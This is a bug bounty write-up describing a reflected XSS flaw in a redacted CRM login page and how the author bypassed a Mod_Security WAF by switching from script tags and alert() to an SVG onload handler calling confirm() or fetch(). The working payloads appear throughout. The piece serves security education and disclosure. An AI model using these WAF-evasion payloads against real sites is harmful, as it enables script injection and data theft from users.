Watch the full video walkthrough:
The Discovery
It started like any other reconnaissance session. I was poking around crm.REDACTED.com, a customer relationship management system I had permission to test. The login page greeted me with a clean, professional interface - yellow header, standard username and password fields, nothing particularly exciting at first glance.

But then I did what any good bug hunter does: I opened the developer tools and started inspecting the page source. That's when something caught my eye.

The page was using a msg parameter in the URL to display messages. You could see it right there in the address bar: login.php?msg=REDACTED%20CRM%20User%20Login. This is always interesting - any user-controlled input that gets reflected back on the page is worth investigating for injection vulnerabilities, also noted it was reflected in a </div> parameter for breakout.
First Blood: Confirming Reflection
I started simple. Could I break out of the existing HTML structure and inject my own content? I modified the URL:
login.php?msg=</div>test
Boom. The word "test" appeared on the page exactly where I injected it. My content was being reflected without any encoding. This was a textbook reflected Cross-Site Scripting (XSS) scenario… or so I thought.
Meeting the Guardian: Mod_Security
Time to escalate. If I could inject HTML, could I inject JavaScript? I tried the most basic XSS payload:
login.php?msg=</div><script>alert("hi")</script>
Not Acceptable!
"An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security."
Ah, there it was. The application had a Web Application Firewall (WAF), and it wasn't happy with my <script> tag. Fair enough - that's literally WAF 101. Let me try to be more subtle:
login.php?msg=</div><script></script>
Nope. Even an empty script tag triggered the WAF. Mod_Security was clearly watching for the <script> keyword. Time to think outside the box.
The Pivot: SVG to the Rescue
The beautiful thing about XSS is that there are dozens of ways to execute JavaScript in a browser. <script> tags are just the most obvious. What about SVG elements? They can contain event handlers too, and many WAFs forget about them.
login.php?msg=</div><svg>
Success! The page loaded normally with my SVG tag intact. No WAF block. The guardian had a blind spot.
Dancing with the WAF
Now for the real test — could I add an event handler to execute JavaScript? I tried adding an onload event with URL encoding to obfuscate the space:
login.php?msg=</div><svg%20onload=alert("hi")>
Blocked again. Interesting. So the WAF wasn't just looking for <script> tags - it was also checking for alert(). This is common; many WAFs specifically blacklist alert() since it's the go-to function for XSS proof-of-concepts.
Let me try without the alert function:
login.php?msg=</div><svg%20onload=test>
It worked! The WAF allowed onload=test through. So the issue wasn't the event handler itself - it was the alert() function specifically. The WAF was doing function-name-based filtering, not structural analysis of whether JavaScript could execute.
This was my opening.
The Kill: Alternative Functions
If alert() was blacklisted but the event handler structure was allowed, I just needed a different function that would prove JavaScript execution. How about confirm()?
login.php?msg=</div><svg%20onload=confirm("XSS")>
BINGO!
The browser popped up a confirmation dialog with "XSS" in it. My JavaScript had executed. The WAF had no rule for confirm(), even though it serves the exact same proof-of-concept purpose as alert(). I had successfully bypassed Mod_Security.
Victory Lap
Just to confirm this wasn't a fluke, I tested another function:
login.php?msg=</div><svg%20onload=fetch()>
Again, no WAF block. The fetch() function - which could be used for actual data exfiltration in a real attack - also wasn't in their blocklist.
The Report
I documented everything and submitted my findings to the security team. The vulnerability was confirmed, the disclosure was approved, and a patch was deployed.
Lessons Learned
This hunt perfectly illustrates why Web Application Firewalls are not silver bullets:
- Signature-based detection has inherent limitations — The WAF knew to block
<script>andalert(), but it couldn't anticipate every possible attack vector. - Creative encoding and alternative syntax bypass pattern matching — By using
<svg>instead of<script>andconfirm()instead ofalert(), I achieved the same outcome while evading detection. - WAFs create a false sense of security — The developers likely thought they were protected because they had Mod_Security deployed. In reality, the application was still vulnerable to XSS.
- Defense in depth is essential — The real fix wasn't improving the WAF rules (though that helped); it was properly encoding user input before displaying it on the page.
This is why I love bug bounty hunting. Every application is a puzzle, every security control is a challenge, and every bypass teaches both attackers and defenders something valuable. The best security comes not from a single wall, but from layers of thoughtful protection.
And sometimes, all it takes to bypass that wall is thinking: "What if I use an SVG instead?"
This writeup describes testing performed with explicit written permission on a fully patched system with all domains and names redacted. Never test systems you don't have authorization to access.
